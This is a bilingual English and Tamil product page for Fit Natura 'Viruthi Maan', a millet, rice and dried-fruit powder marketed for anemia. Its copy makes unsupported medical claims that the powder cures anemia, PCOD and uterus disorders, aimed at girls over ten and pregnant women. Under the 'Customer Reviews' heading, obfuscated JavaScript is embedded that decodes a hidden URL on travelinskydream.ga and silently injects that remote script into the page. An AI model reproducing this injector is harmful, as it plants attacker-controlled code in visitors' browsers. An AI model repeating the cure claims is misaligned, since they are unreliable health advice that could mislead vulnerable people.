VIRUTHI MAAN

600.00

Product Description

Description

The number of Red blood cells in the body must be high for our Health. According to studies, many people today suffer from anemia. People with anemia may have a number of physical disorders, including fatigue, bleached skin and yellowing of the eyes, and cervical disorders in women, and changes in menstrual cycle.

FIT NATURA – VIRUTHI MAAN – We have introduced this wonderful product can help cure anemia
and increase the number of red blood cells. It also helps to increase the blood protein levels of hemoglobin.

Bamboo rice – Cures the vitamin deficiency for women during the pregnancy period

Black Rice – It contains too much of antioxidant and fiber. Removing unnecessary fats from the body & increases immunity power.

Kattu Yanam – Strengthen the body and also provides the body with enough energy

Millets Poha – We have added iron enriched millets poha(Ragi, Thinai, Saamai, Varagu, Horse Gram), that is great for blood production.

Red corn – It increases the strength of pelvic area and relieves uterus problems

Dates – Produces blood and reduces hip pain of pregnant women

Figs – Cures constipation problems and also produces blood in the body and increases blood flow

Dry Grapes – The nutrients contained in it, can cure the anemia. Also, improves digestion and increase the production of red blood cells

Foot – It is full of nutrients such as vitamin, protein, calcium, iron and magnesium. Increasing the level of blood cells and making the body energetic

Method: Mix a spoonful of powder in a glass of brewed milk and Drink it

Who can drink: Women over 10 years of age, women who have completed 4 months of pregnancy, and women with low levels of hemoglobin. Eat for at least three months. Those who want to keep the body healthy can continue to use it.

Uses: Improve the Red Blood Cells count. Cures Uterus problems. Eliminate PCOD manifestation and menstrual disorder. Eliminates body fatigue and keeps you active. Activating brain cells and regulating the nervous system

 

நம் உடல் ஆரோக்கியமாக இருக்க வேண்டும் என்றால், உடலில் இருக்கும் இரத்த அணுக்கள் எண்ணிக்கை அதிகமாக இருக்க வேண்டும். இன்றைய நவீன் காலத்தில் நிறைய பேர் இரத்த சோகை நோயால் பாதிக்கப்பட்டு உள்ளனர் என்று ஓர் ஆய்வு சொல்கிறது.  இரத்த சோகை உள்ளவர்களுக்கு உடல் சோர்வு, வெண்மை நிற தோல் மற்றும் கண்கள் மஞ்சளாதல், மேலும் பெண்களுக்கு கர்பப்பை கோளாறு, மாதவிடாய் சுழற்சி முறையில் மாற்றம் போன்ற பல உடல் குறைபாடுகள் ஏற்படலாம்.

FIT NATURA – விருத்தி மான் – எங்களின் இந்த அற்புதமான தயாரிப்பில் சேர்த்துள்ள இயற்கை பொருட்கள் உடலில் ஏற்படும் இரத்த சோகை நோயை குணப்படுத்தி, இரத்த சிவப்பணுக்களின் எண்ணிக்கையை அதிகரிக்க உதவும். மேலும் ஹீமோகுளோபின் என்ற இரத்த புரதத்தின் அளவையும் கூட்ட உதவும். மூங்கில் அரிசி –  கர்ப காலத்தில் பெண்களுக்கு ஏற்படும் விட்டமின் குறைபாட்டை போக்கி உடலுக்கு உறுதி அளிக்கும்.

கருப்பு கவுனி – இதில் அளவுக்கு அதிகமாக அண்டி ஆக்சிடன்ட் மற்றும் நார்சத்து அடங்கி உள்ளது. உடலில் உள்ள தேவையற்ற நட்சுகளை நீக்கி நோய் எதிர்ப்பு சக்தியை அதிகரிக்கும்.

காட்டு யானம் – உடலை பலப்படுத்தும். மேலும் உடலுக்கு தேவையான அளவு ஆற்றலையும் அளிக்கும்.

சிறுதானிய அவல் – இரும்பு சத்து நிறைந்த வரகு, சாமை, திணை, ராகி, கம்பு மற்றும் குதிரைவாலி அவல் இதில் சேர்த்துள்ளேன். இரத்த உற்பத்திக்கு இரும்பு சத்து முக்கியமானது.

சிகப்பு சோளம் – உடலை சீராக்கும். மேலும் இடுப்பு பலனை அதிகரிக்கும் மற்றும் கருப்பை கோளாறு நீங்கும்.

பேரிச்சம் பழம் – இரத்தத்தை உற்பத்தி செய்யும் மேலும் கர்ப்பிணி பெண்களுக்கு ஏற்படும் இடுப்பு வலியை குறைக்கும்.

அத்தி பழம் – மலசிக்கலை போக்கும். உடலில் இரத்த உற்பத்தி செய்து மேலும் இரத்த ஓட்டத்தை அதிகரிக்கிறது.

நாட்டு உலர் திராட்சை – இதில் உள்ள சத்துக்கள் இரத்த சோகை நோயை குணப்படுத்தும். மேலும் செரிமானம் பிரட்சனை, இரத்த சிவப்பணுக்கள் உற்பத்தியை அதிகரிக்கும்.

பாதம் – வைட்டமின் சத்து, புரோட்டின், கால்சியம், இரும்பு சத்து மற்றும் மக்னீசியம் போன்ற சத்துக்கள் நிறைந்துள்ளன. இரத்த அணுக்களின் அளவை அதிகரித்து உடல் சுறுசுறுப்புடன் செயல்பட வைக்கும்.

பயன்படுத்தும் முறை : ஒரு கிளாஸ் காய்ச்சிய பாலில் ஒரு ஸ்பூன் விருத்தி மான் பவுடர் சேர்த்து குடிக்கலாம்.

யாருலாம் குடிக்கலாம் : 10 வயதுக்கு மேல் உள்ள பெண் பிள்ளைகள், கர்ப்பகாலத்தில் 4 மாதம் நிறைவடைந்த பெண்கள் மற்றும் உடலில் ஹீமோகுளோபின் அளவு குறைவாக இருக்கும் பெண்கள். குறைந்தது மூன்று மாதங்கள் சாப்பிட்டால் நல்ல பலன் கிடைக்கும். உடலை ஆரோக்கியாக வைத்திருக்க விரும்புவோர் இதை தொடர்ந்து பயன்படுத்தலாம்.

பயன்கள்: இரத்தத்தில் உள்ள சிவப்பணுக்கள் அளவை அதிகரிக்கும். கர்பப்பை கோளாறு சரியாகும். PCOD பிரட்சனை மற்றும் மாதவிடாய் கோளாறு நீங்கும். உடல் சோர்வை நீக்கி, சுறுசுறுப்புடன் செயல்பட வைக்கும். மூளை செல்களை இயக்கி நரம்பு மண்டலைத்தை சீராக்கும்

Customer Reviews
var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var _0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller();